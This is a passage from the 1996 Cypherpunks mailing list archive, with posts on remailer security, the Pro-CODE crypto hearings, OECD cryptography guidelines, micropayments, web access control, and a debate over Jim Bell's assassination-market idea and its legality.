= > Actually, he's probably right. If all the cypherpunks, say, turned    
= > "bad," there'd be no government and no economy, because so many big    
= > systems are so insecure.   
=    
= One could make the case that this would actually make the United     
= States(if c'punks concentrated their attentions there) the most data     
= secure country on the planet over time.   
=   
  
	regardless of their opinion on hackers, that is what secuirty  
    is all about.  the same is not true for crackers --maybe we need to  
    run a campaign with the slogan of:   
  
		Hackers (help) prevent Crackers!  
  


--
the last free election in the United States was in 1860.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Fri, 7 Jun 1996 19:06:22 +0800
To: cypherpunks@toad.com
Subject: Re: Multiple Remailers at a site?
In-Reply-To: <19960604232157.2053.qmail@ns.crynwr.com>
Message-ID: <19960607045419.11244.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to be following up to my own message Yet Again, but I see a hole
in my analysis that needs patching.

If you have a mixmaster host M, with certain characteristics (latency,
reordering, and traffic volume), that is NOT identical in security to
a mixmaster network M with identical characteristics, but in which
some hosts are not trustable.  The non-trustable host(s) keep track of
their latency, reordering, and traffic volume, so it's removed from
the characteristics of the network above.

Therefore, to keep the characteristics of the trusted host constant
when converting into a partially trusted network, each of the
individual hosts needs to increase their parameters by some amount
(which amount someone else will have to contribute, cuz I have no clue
and need sleep).

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Fri, 7 Jun 1996 19:49:06 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: whitehouse web incident, viva la web revolution
In-Reply-To: <9606061643.AA03971@Etna.ai.mit.edu>
Message-ID: <Pine.3.89.9606070553.A624-0100000@netcom2>
MIME-Version: 1.0
Content-Type: text/plain



	Phill:

On Thu, 6 Jun 1996 hallam@Etna.ai.mit.edu wrote:

> >	circumstances.  <<  It is something like 1 chance in
> >	15 511 210 000 000 000 000 000 000.  >>
> Rubbish, 2^25 is 33,554,432. How do you calculate your figures? 

	You have one chance in three, of showing a profit, in 
	one trade.  For 25 consecutive trades to show a profit
	it is 1 chance in 3^25.  <<  Slightly lower than my original
	25!, which is what the odds are, if the trades have to
	occur in a specific sequence. >> 

> If you hit a favourable market for your strategy you can win big. 

	_If_ is the operative word there.  

> Problem is 
> that after a while others are likley to cotton on to your strategy. 

	Or in Hillary's case, no strategy at all, just
	pure, dumb luck that she caught all those
	successfull trades, and then quit.  

	Can anybody replicate her trades, on any futures market,
	and gain anything close to the success she had?  

        xan

        jonathon
        grafolog@netcom.com


**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 7 Jun 1996 22:07:41 +0800
To: cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
Message-ID: <2.2.32.19960607102709.00cba438@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:54 PM 6/6/96 -0700, Timothy C. May wrote:
>(There may be cases people can dig up where some newspaper or newsletter
>was "shut down," but I think such cases would be hard to find in the last
>several decades. Am I wrong on this?)

Not newspapers but a number of radio stations of course.  Licensure.  Even
under CDA, we are not subject to license, however.  Though I wonder how the
FCC will behave as TV stations join the radio and "radio" stations that are
already netcasting beyond its control.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut4.qut@netcom.com
Date: Sat, 8 Jun 1996 03:11:56 +0800
To: cypherpunks@toad.com
Subject: Thank you for the Archives 100 messages
Message-ID: <199606071402.HAA10943@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Apologies, but rich has deleted me from
his mailboxes, and for a few days now,
somebody has placed a global cancel bot on
me.  I'm gonna have plenty of fun figuring
this out.  Kwow any good sniffers?

I agree the list should be public usenet:
A mail gate-way to a usenet group that
ALSO permits unmoderated posts.  This
would be a nice way to combine a strict
moderated mail-list, with a standard 
netnews group.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Sat, 8 Jun 1996 05:33:27 +0800
To: cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
In-Reply-To: <199606070633.XAA01053@mail.pacifier.com>
Message-ID: <199606071523.IAA12176@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Regarding TCM's en passant comment that Bell's ideas are derivative:

jim bell <jimbell@pacifier.com> writes:
>Technically, it wasn't derived from anything directly, or for that matter 
>even indirectly.  However, since there's nothing new under the sun,

Try Gilbert & Sullivan's operetta "Utopia, Ltd."  Assassinating the ruler
was fine and/or encouraged, but the assassin had to take his place.  Not
as close as the Dirty Harry movie, though...

>I generally don't feel the need to name specific people.  I'm sure each 
>reader has his own pet list to fall back on.

Aha.  Gilbert & Sullivan again, this time from the Mikado:  "I've got a
little list of society offenders who might well be under ground, and who
never would be missed."  That's Koko, the Lord High Executioner, casting
about for the next victim.  However, in Mikado assassinating an Heir
Apparent was a punishable offense.  Something <lingering> involving
boiling oil, as I recall.

I noted recently a news article listing about 4 "dead pools" around the
Web, not even counting the Idea Futures death claims.  I don't recall that
any of them used real money.

	Jim Gillogly
	Sterday, 18 Forelithe S.R. 1996, 15:17




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sat, 8 Jun 1996 05:41:33 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
Message-ID: <199606071535.IAA27849@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:54 AM 6/6/96 -0400, Duncan Frissell wrote:
> (I've often
> wondered why Hamas uses/used couriers for getting funds to Israel when
> Israel has a great ATM network with international links.)

Sounds like you are suffering caffeine withdrawal.  Try wondering again 
after you have had some coffee.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 8 Jun 1996 04:42:12 +0800
To: jimbell@pacifier.com>
Subject: Re: FOR WHOM THE BELL TOLLS
In-Reply-To: <199606070633.XAA01053@mail.pacifier.com>
Message-ID: <8li234S00YUzE1usAp@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 6-Jun-96 Re: FOR WHOM THE BELL TOLLS
by jim bell@pacifier.com 
> Not quite yet, anyway.  I'm very disappointed to have waited over a year for 
> some slick lawyer to show me how I'd be violating some law or another
to do so
> .

A few observations:

1. Not many readers of cypherpunks are lawyers
2. Of the laywers who do read cypherpunks, many may not choose to spend
their time researching what laws AP may violate. Or they're not "slick"
lawyers; take your pick.
3. Congress would have no problems passing a law outlawing AP, if one
does not exist already.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brock N. Meeks" <brock@well.com>
Date: Sat, 8 Jun 1996 05:23:17 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: whitehouse web incident, viva la web revolution
In-Reply-To: <Ilhv_bu00YUzIx19wP@andrew.cmu.edu>
Message-ID: <Pine.3.89.9606070804.A29868-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain


Hey, you misinformed Dolt Hallam-Baker, for the record
I voted for Clinton.  I won't for Dole.  Now, back in your cave.

--Brock




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagtje.cs.colorado.edu>
Date: Sat, 8 Jun 1996 04:28:35 +0800
To: Jeff Barber <jeffb@sware.com>
Subject: Re: Micropayments: myth?
In-Reply-To: <199606070205.WAA20230@jafar.sware.com>
Message-ID: <199606071441.KAA13062@nagtje.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Hello Jeff B, vznuri, szabo & alia.


Jeff wrote:
>
> Or are you saying that each IP packet will have an appropriately sized
> digital cash payment attached?  That seems like too much overhead.
  
  
So people who work on micropayments are trying to reduce that 
overhead.  It is clear to me that it is feasible to do so.  
(Someone have a list of references to published micropayment
schemes that I can insert here?)  IPng headers have plenty of
room for this kind of thing, don't they?
 
 
Also on this thread someone mentioned seeing an icon that says  
"5 cents" and clicking on it to pay 5 cents from their wallet.  
Well, please start your Ecash(tm) wallet and visit 
"http://www.c2.net/~bryce/BuyBAP.html".  Click on the dime.  
Better yet click on the pair of quarters.  As a bonus you 
actually get a copy of 'Bryce's Easy PGP', too!
 
 
(Sameer's the one to blame for this new threat to our national
security/children's innocence/community standards/etc.  His
"Ecash(tm) integrated with c2.net" system underlies my
cybershop.)
 
 
Regards,
 
Bryce
 
#include <stddisclamer.h> /* I'm not speaking for anyone else at this time. */
- ----- BEGIN GOODTIMES VIRUS INNOCULATION -----
Once you have read and understood this .sig, you are immune 
to the Good Times virus.  Please help spread this innoculation!
- ----- END GOODTIMES VIRUS INNOCULATION -----




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: www.c2.net/~bryce -- 'BAP' Easy-PGP v1.1b2

iQCVAwUBMbg/mvWZSllhfG25AQGOGwP/SwDNHECjGy5a7dNVIVZEjLofN+Dgsoq0
ri7LrIE/m5hyj9Xu2HelM8o8p8e2bTylQ7GFcTZVFYBYMbb2INldFacf4X/hGfrG
snhDWuV2ZQts4/CO92hQ44OhPSCTFPHH+nKnocTQRwNOySqPWGTxSxnvFO+Grguv
NMv7U9k/do0=
=uvhj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Sat, 8 Jun 1996 02:47:04 +0800
To: cypherpunks@toad.com
Subject: INFO: Discuss crypto with Sen. Burns online the night before hearings!
Message-ID: <199606071312.JAA08699@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


=============================================================================
          ____                  _              _   _
         / ___|_ __ _   _ _ __ | |_ ___       | \ | | _____      _____
        | |   | '__| | | | '_ \| __/ _ \ _____|  \| |/ _ \ \ /\ / / __|
        | |___| |  | |_| | |_) | || (_) |_____| |\  |  __/\ V  V /\__ \
         \____|_|   \__, | .__/ \__\___/      |_| \_|\___| \_/\_/ |___/
                    |___/|_|

           CRYPTO HEARINGS (S.1726) SET FOR 6/12/96 IN WASHINGTON D.C.
          MEET AND SPEAK TO SENATOR BURNS ON HOTWIRED THE NIGHT BEFORE!
      SEN. CONRAD BURNS (R-MT) SCHEDULED FOR HOTWIRED CHAT 6/11/96 10-11PM EST

                              Date: June 7, 1996

         URL:http://www.crypto.com/            crypto-news@panix.com
           If you redistribute this, please do so in its entirety,
                         with the banner intact.
-----------------------------------------------------------------------------
Table of Contents
        News
	Press Release on Hearings
        How to receive crypto-news
        Press contacts

-----------------------------------------------------------------------------
NEWS

In what is becoming the newest way for Congress to read the net.community's
opinion on issues, Senator Conrad Burns will be on HotWired on June
11th @ 10pm EST to discuss the encryption issue with all attendees.
The next day, Senator Burns will be coordinating a day of hearings on the
encryption issues with industry luminaries.  

Never before has the public had this much access to legislators without
geographical proximity.  Cheaper than teleconferencing, and more direct
and unfiltered than the traditional press, online chats allow the public
to directly question and hear the answers of Congress.  

Have a question about encryption policy that you've never been able to find
out from the government?  Come to the HotWired chat and ask Senator Burns
to be your advocate, to press the witnesses and the White House on these
issues.

The online chat is on June 11 at 10pm EST, the night before the hearings 
HotWired's WiredSide chat is at (http://www.hotwired.com/wiredside).

Information on Senator Burns' legislation is available at
http://www.crypto.com

-----------------------------------------------------------------------------
PRESS RELEASE ON HEARINGS

  Senator Conrad Burns (R-Mont.)
  WEB SITE   http://www.senate.gov/~burns/

  For immediate release:          Contact:                  Matt Raymond
  Thursday, June 6, 1996                                  (202) 224-8150
                                                         Randall Popelka
                                                          (202) 224-6137

  First Pro-CODE Hearing Slated
  Burns' Subcommittee to Hear High-Profile Executives, Witnesses

          WASHINGTON, D.C. _ Montana Senator Conrad Burns today announced
  the first of two Senate hearings on S. 1726, the Promotion of Commerce
  Online in the Digital Era Act of 1996, or "Pro-CODE."  The hearing will
  take place in the Commerce Subcommittee on Science, Technology and Space,
  of which Burns is chairman.

          The hearing is scheduled Wednesday, June 12, at 9:30 a.m. in room
  253 of the Russell Senate Office Building.

          Scheduled to testify are: Michael Zisman, president and CEO of
  Lotus; Jim Barksdale, president and CEO of Netscape Communications; Jim
  Bidzos, president and CEO of RSA Data Security; Tim Krauskopf, V.P. and
  co-founder of Spyglass Inc.; Kenneth Dam, chairman of the National
  Research Council; Douglas J. McGowan, director of the SmartCard Alliance
  for Hewlett-Packard; Computer Systems Policy Project representative
  (invited); Joe Holmes, chief technology officer for EDS; Joel S. Lisker,
  senior V.P. for security and risk management at MasterCard; Danne
  Buchanan, president of Zion's Data Services Company; Jack Valenti,
  executive director of the Motion Picture Association of America; Aharon
  Friedman, chairman, founder and chief technical officer of Digital
  Secured Networks Technology Inc.; Steve Case, president and CEO of
  America Online (invited); and Robert Bigomy, senior V.P. and director of
  strategic marketing, government and space technology group, for Motorola.

          Burns said the focus of the hearing is on commerce and business
  issues.  He said a second hearing, which will focus on privacy, law
  enforcement and national security issues, is scheduled in his
  subcommittee on June 26.

          The bipartisan Pro-CODE bill would ease export restrictions on
  computer security, or "encryption," for software and hardware.  It would
  also prohibit mandatory systems in which users or companies would have to
  place a code-breaking "key" in the hands of a third party.

                                        # # #

-----------------------------------------------------------------------------
HOW TO RECEIVE CRYPTO-NEWS

To subscribe to crypto-news, sign up from our WWW page (http://www.crypto.com)
or send mail to majordomo@panix.com with "subscribe crypto-news" in the body
of the message.
-----------------------------------------------------------------------------
PRESS CONTACT INFORMATION

Press inquiries on Crypto-News should be directed to
	Shabbir J. Safdar (VTW) at +1.718.596.2851 or shabbir@vtw.org
	Jonah Seiger (CDT) at +1.202.637.9800 or jseiger@cdt.org

-----------------------------------------------------------------------------
End crypto-news
=============================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Clay Olbon II" <Clay.Olbon@dynetics.com>
Date: Sat, 8 Jun 1996 03:26:52 +0800
To: "jonathon" <grafolog@netcom.com>
Subject: Re: whitehouse web incident, viva la web revolution
Message-ID: <ADDDA7B6-382D7B@193.239.225.200>
MIME-Version: 1.0
Content-Type: text/plain


Jonathon,

>	Statistical proof is only accepted in academia.  Depending
>	upon your POV, this may or may not be a good thing, when
>	one is facing civil, or criminal charges.  
>
>	Finding proof for either civil or criminal charges is a 
>	slightly different matter.

IANAL, but your statements are misleading.  Statistics are often used in
both criminal and civil cases.  Look at the DNA evidence in the OJ trial
(OK, maybe a bad example), or the evidence that breast implants don't cause
various ailments (probably another bad example :-).  Both of these examples
are based on statistics.  IMO, part of the problem with juries (and public
discourse in general) today is that anecdotal evidence is often accepted,
when that evidence is clearly not statistically significant.  The examples
I cited previously illustrate this - the four horsemen are a similar
example for public policymaking.  

	Clay

---------------------------------------------------------------------------
Clay Olbon II            | Clay.Olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: on web page
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
                     TANSTAAFL
---------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 8 Jun 1996 07:41:01 +0800
To: cypherpunks@toad.com
Subject: It tolls for thee
Message-ID: <addda7cd01021004f950@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:29 AM 6/7/96, jim bell wrote:

>Even so, given how much noise we've been hearing out of DC on the subject
>of the Internet, digital cash, and good encryption, I'd say SOMEBODY is
>getting a bit worried.  I haven't exactly been keeping this stuff a secret:
>What do you think their reaction has been, so far?  When those
>government-types start considering various scary scenarios, what do you
>think they are imagining?

I don't think any significant amount of the current stuff coming out of
Washington has anything to do with my words, your words, or the words of
anyone on this or any other forum I know about.

Importantly, I'm including my own words, explicitly. Sorry to burst _our_
bubbles, but I just don't think the lawmakers and burrowcrats are being
driven by loose talk by us.

Rather, the reasons for their actions and hyperbole about the Net, the Web,
online porn, money laundering, the "information highway," and all that
trendy stuff is because they can see many of the same trends we see.

While I have a certain amount of pride that my single-page "Crypto
Anarchist Manifesto" essentially nailed a bunch of trends which have become
obvious to all in the 8 years after I issued it, I don't for a picosecond
think anything I wrote then or since has had any significant effect on
proposed leglislation.

While some of our writings and talk may have inspired "sound bites" in
their own reports, the concerns governments have about strong cryptography,
transparent borders, alternative forms of money, data havens, etc., are
easy to understand.


>Not quite yet, anyway.  I'm very disappointed to have waited over a year for
>some slick lawyer to show me how I'd be violating some law or another to do so.

This is factually incorrect. I recall at least one law professor and at
least one assistant DA publically commenting on the legal implications of
your actual deployment of AP (as opposed to merely speculating about such
things, which all agree is protected speech). And this was soon after your
initial flurry of posts describing your "wonderful idea."

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sat, 8 Jun 1996 03:23:45 +0800
To: nelson@crynwr.com
Subject: Re: Electronic Signatures
In-Reply-To: <19960606185840.9230.qmail@ns.crynwr.com>
Message-ID: <Pine.SUN.3.93.960607100847.6828D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On 6 Jun 1996 nelson@crynwr.com wrote:

>  > 
>  > 	The law does not specify how an electronic document must be 
>  > signed, but Barassi and others say it probably will mean coding the text 
>  > and typed signature so they cannot be changed by anyone other than the 
>  > writer.
> 

Before you get all hot under the collar, may I note that I've known
Barassi for more than a year, and he is very technically sophisticated.
Allow for some reporter-garble.   Barassi understands digital signatures
as well as you do.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here, and humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 8 Jun 1996 07:56:48 +0800
To: cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
Message-ID: <199606071725.KAA26027@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:05 AM 6/7/96 -0000, nelson@crynwr.com wrote:
>jim bell writes:
>
> > My impression is that it is frequently the pacifist-types who get us into 
> > war, because they start the process out by tolerating actions by others that 
> > turn into more serious actions, etc.  You know, the appeasers.  Are you an 
> > appeaser?
>
>A quote from Donald Wetzel's book Pacifist:
>
>The pacifist is often asked what he would do in the event the United
>States were to be conquered by a hostile power.  The assumption on the
>part of the questioner is almost always that we would simply assume
>the proper position in which best to have our asses kicked.  I suggest
>that anyone who believes that such would be the pacifist response to
>the imposition in America of an oppressive, authoritarian
>rule--foreign or domestic--should consult the prison authorities that
>were in power when America's prisons were host to some six thousand
>pacifists.  I am sure it will be found that we have not been
>forgotten.

I propose that there has ALREADY been "the imposition in America of an 
oppressive, authoritarian rule."

What are the pacifists doing now?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 8 Jun 1996 05:24:49 +0800
To: hallam@etna.ai.mit.edu
Subject: Re: Anonymous stock trades.
In-Reply-To: <9606062327.AA04162@Etna.ai.mit.edu>
Message-ID: <199606071452.KAA18055@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@Etna.ai.mit.edu writes:
> 
> >I suppose it depends on what you call "open", eh, Phill?
> 
> >If by "open", you mean financial markets where, as Milton Freedman says,
> >each new regulation raises the cost of entry and protects the surviving
> >firms by killing their smaller competion with red tape, then we have "open"
> >markets.
> 
> Well, Milton Friedman's method for saving the whale is to leave it
> to the free market, if people want whales in the oceans they won't
> buy whale meat.

Dr. Phill Hallam-Baker, PhD, seems to know even less about free market
environmentalism than he knows about futures and options.

Of course, what Dr. Phill Hallam-Baker, PhD, suggests is idiotic. As
any free market economist would tell you, the way to stop a resource
from being destroyed is not to pray that people won't buy it but to
assure that someone has an ownership stake in the resource, thus
assuring that their investment would be destroyed if the resource
vanished. Thats why, for instance, timber companies happily clear cut
government land that they have leased (after all, not clear cutting
would mean that they wouldn't extract maximum value for their lease
under the idiotic terms that the leases are made under) but will
almost never clear cut their own lands, because that would reduce
their long term value.

Dr. Phill Hallam-Baker, PhD, however, does not understand economics in
spite of his PhD and thus attributes views to free market economists
that they do not hold, as in his whole cloth synthesis of a viewpoint
which he ascribed to Milton Friedman which Milton Friedman would never
in a million years espouse.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean T Carnes <crisper@ascensionet.com>
Date: Sat, 8 Jun 1996 05:24:48 +0800
To: "'Cypherpunks'" <cypherpunks@toad.com>
Subject: Jobs
Message-ID: <01BB5460.9B743B20@ppp3>
MIME-Version: 1.0
Content-Type: text/plain


I am looking for a job in the computer business doing basically anything computer related, except something like typing all day, where i could get some experience around different computer enviroments.  I have good knowledge of PC's and of some basic network situations.  If anyone is in the NY metro area or on Long Island and is looking for some summer help could you please e-mail me back.

Thanks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 8 Jun 1996 16:13:27 +0800
To: hiroko.kamata@oecd.org
Subject: Re: OECD http://www.oecd.org/news_and_events/release/nw96-46a.htm
Message-ID: <199606071824.LAA06312@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Ms. Kamata wrote:
>>The process of drafting the OECD Cryptography Policy Guidelines will
>>continue at an experts meeting in June and is due for completion in
>>early 1997.

Cryptography policy is a matter of vital public interest;
while I assume that actual participation will be limited by the
need for a small enough group to actually get work done,
the World-Wide Web makes it easy to publish working papers,
meeting agendas, drafts, and participant contact information
so that the public can keep track of what's being done.
There's a lot of broad-level material on your web site (I enjoyed the 
perspective of http://www.oecd.org/dsti/iccp/legal/top-page.html),
but it would be a substantial benefit to the community to
provide the in-depth material as well.

At 08:39 PM 6/6/96 -0800, Jim Bell wrote, replying to Ms. Kamata's
press release:
>>OECD EXPERTS BEGIN DRAFTING CRYPTOGRAPHY GUIDELINES 
>>Many governments are under pressure within their own countries to
>>develop a national position on cryptography, 
>
>If anything, it's exactly the opposite:  It is the GOVERNMENTS and
>those who hold government jobs who are doing the "pressuring."   
>I haven't seen more than a trickle of desire for a 
>"national position on cryptography."  What Internet-people want is the 
>ELIMINATION of a "national position on cryptography," I think.

Most governments already have a "national position", restricting
cryptography in ways that violate free speech by their citizenry
and interfere with commerce to varying degrees.  The US has been
one of the more egregious violators in this case, since US companies
and products dominate the software industry, and national police organs
have been strongly opposing the industry's attempts to provide decent
security for communications.  Industry, on the other hand, has been
pressuring government to allow at least enough security to prevent
massive fraud and theft and protect proprietary business communications;
some parts of industry are willing to compromise if they get this much
(perhaps with the added bribe of government contracts to make up for
lost opportunities in the free market), while other parts (especially
smaller companies, where the costs of bureaucratic compliance 
have more effect, and where proprietors can speak for the company)
take a far stronger view, that freedom of speech cannot be compromised.

>>But the needs of global technologies and applications require an 
>>international --rather than a strictly national -- approach to 
>>policymaking.  The fast-paced development of the Global Information 
>>Infrastructure adds an element of urgency.

The global characteristics of technology render strictly national
policymaking increasingly obsolete, because any individual in a free
or semi-free computerized country can develop software like PGP
which can at most be blocked by vigorous local government action.
There are two added forms of urgency - the critical need for security for
electronic commerce, which is growing rapidly and increasingly in conflict
with nationalist military policies, and the increasing deployment of
technology which reduces government control.

>>The private sector is closely involved in drafting the Guidelines,
>>with business representatives from the Business and Industry Advisory
>>Committee (BIAC) participating at the meeting. 
>>The OECD meeting, which took place on 8 May, was hosted by the US
>>Department of State in Washington DC.

Was the meeting announced to at least the public in advance?
The schedule on the web page mentioned the 8 May meeting,
at least after the fact, but does not list any of the following
meetings, and there's no identification of your BIAC committee's
members or even the member governments participating.

                Thanks!
#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Rescind Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 8 Jun 1996 11:24:04 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <2.2.32.19960607185634.00749a80@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

At 08:29 AM 6/7/96 -0700, you wrote, re: using ATM machines
instead of couriers:

>Sounds like you are suffering caffeine withdrawal.  Try 
>wondering again after you have had some coffee.

Gosh, I don't even drink coffee and I think Duncan is 
absolutely right on point.  Snide remarks notwithstanding,
what substantive critique do you have of Duncan's remarks?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 8 Jun 1996 09:48:53 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: WWW servers.
Message-ID: <199606071858.LAA28919@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn:
>> Does there currently exist a system which permits webservers to restrict 
>> access to clients who have a given certification?

Sameer:
>       Yup.
....
>       =) Stronghold: The Apache-SSL-US, coupled with XCert
>Sentry. What else?

Bill Stewart:
>Of course, there's a simpler approach; restrict access to people
>who have logins and passwords, and only give those to people
>who have the certification...

But of course, cleartext passwords have their own problems.  You really
need to make use of the fact that there is a computer at both ends so you
are protected from replay attacks.  With that caveat, passwords work fine
(except for the difficulty of remembering a bunch of them vs. the
insecurity of using the same one multiple places or writing them down).


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 8 Jun 1996 13:51:31 +0800
To: hallam@etna.ai.mit.edu
Subject: Re: Anonymous stock trades.
Message-ID: <199606071858.LAA28924@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:52 AM 6/7/96 -0400, Perry E. Metzger wrote:
>... As
>any free market economist would tell you, the way to stop a resource
>from being destroyed is not to pray that people won't buy it but to
>assure that someone has an ownership stake in the resource, thus
>assuring that their investment would be destroyed if the resource
>vanished. Thats why, for instance, timber companies happily clear cut
>government land that they have leased (after all, not clear cutting
>would mean that they wouldn't extract maximum value for their lease
>under the idiotic terms that the leases are made under) but will
>almost never clear cut their own lands, because that would reduce
>their long term value.

I find this analysis a bit superficial because it does not consider the
difference between short-term and long-term value.  To use Perry's example
of the timber industry.  Before the late 1980s, the lands owned by Pacific
Lumber were managed for long-term production.  When the company was taken
over as part of the "maximize present value" movement in the late 1980s,
the management goals changed to increase timber production without regard
to long-term production.  (I seem to remember that the takeover was one of
Michael Milken's deals.)

My conclusion from this example is that if your interest is in the
long-term preservation of ecosystems, you need institutions that are
structured so they take a long-term view, and can not be subverted by
short-term trends in markets.  As far as I can tell, the US National Park
Service, for all its faults, does as good a job of preserving ecosystems as
any other institution, and better than most.  (If you disagree, please
provide examples of institutions that do as well.)


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: caal@hopf.dnai.com
Date: Sat, 8 Jun 1996 12:29:39 +0800
To: cypherpunks@toad.com
Subject: Internet solution for law enforcement
Message-ID: <199606071900.MAA12968@hopf.dnai.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone seen this yet?  Looks like it's two weeks old.  Internet Police!

>[BizWire]    5/20/96
>
>        (SUN/PSI-INTL)(SUNW) PSI International, Sun partner, unveils Java-
>        based Internet solution for law enforcement agencies; "Internet in
